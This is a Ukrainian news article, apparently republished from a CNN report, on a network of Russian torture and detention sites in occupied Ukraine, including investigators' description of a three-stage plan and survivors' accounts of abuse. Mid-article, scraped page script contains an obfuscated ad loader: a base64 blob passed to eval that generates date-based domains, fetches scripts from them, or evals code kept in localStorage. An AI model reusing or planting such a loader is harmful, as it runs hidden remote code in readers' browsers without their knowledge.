Росіяни створили на окупованих територіях мережу катівень

Російські загарбники створили на тимчасово окупованих територіях України мережу з 20 катівень. Як повідомляє ресурс CNN з посиланням на слова українських і міжнародних юристів, такі заклади були потрібні для знищення української ідентичності.

У росіян була стратегія щодо використання катівень. Ці методи застосовувалися в тому числі і на Київщині у березні минулого року, однак через досить тривалу окупацію Херсону росіяни зайшли там ще далі.

«Ці ізолятори пов’язані між собою, вони дотримуються дуже схожого, якщо не ідентичного способу поведінки», — запевняє Вейн Джордаш, котрий є керівником колективу міжнародних слідчих Mobile Justice Team.

Цей колектив надає допомогу у розслідуваннях офісу Генерального прокурора України. Джордаш додає, що Росія дотримувалася конкретного плану застосування тортур, котрий ділився на три етапи. Під час перших двох передбачалася ліквідація лідерів повстань та причетних до них осіб:

«Перший етап, по суті, полягає у затриманні та, у багатьох випадках, убивстві категорії людей, позначених як «лідери», тобто тих, хто міг фізично чинити опір окупації, а також тих, хто міг би чинити їй культурний опір.

Другий етап — це свого роду процес фільтрації, коли населення, яке залишається за межами центрів ув’язнення, підлягає постійному моніторингу та фільтрації, щоб усі, кого підозрюють у зв’язках з «лідерами» або причетними до організації будь-якого типу опору, також були потім ідентифікували та або депортували до Росії, або їх утримували в ізоляторах і катували», — сказав Джордаш.

Керівник також розповів і про третій етап, ціллю якого було зникнення постійної української ідентичності. Під час його реалізації вилучали проукраїнські предмети (прапори, синьо-жовті футболки, тощо) або ж вилучали українську програму зі шкіл. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

«По суті, населення було ізольоване, щоб можна було видалити всі сліди української ідентичності», — пояснює він.

Також CNN поспілкувався з одним із заручників, котрі піддавалися тортурам в Херсоні. Він зазначає, що якщо хтось хотів отримати сигарету чи цукерку, то йому потрібно було заспівати гімн Росії, або закричати «Слава Путіну! Слава Росії! Слава Шойгу!». У випадку відмови застосовувалося фізичне насильство.

Інший ув’язнений згадував, як його били кийками і ногами та катували електричним струмом. Голодом не морили, але і багато не годували. Його звільнили через дев’ять днів утримання після того, як він погодився на співпрацю з загарбниками.

Українські та міжнародні слідчі також заявили, що виявили фінансові зв’язки цих ізоляторів з російською державою.

«Ці центри ув’язнення мають фінансові зв’язки з російською державою. Ці фінансові документи показують, що цивільна адміністрація фінансується з Росії, а цивільна адміністрація фінансує центри ув’язнення, тому у вас є дуже чіткі моделі та дуже чіткі зв’язки», — передає слова Джордаша CNN.

Керівник колективу міжнародних слідчих заявив, що Херсон тільки привідкриває завісу того, що могло статися з рештою частиною України у випадку повної окупації держави. Це могло призвести б до безпрецедентної кількості затримань, катувань і вбивств. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/rosiyani-stvorili-na-okupovanih-teritoriyah-merezhu-kativen/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top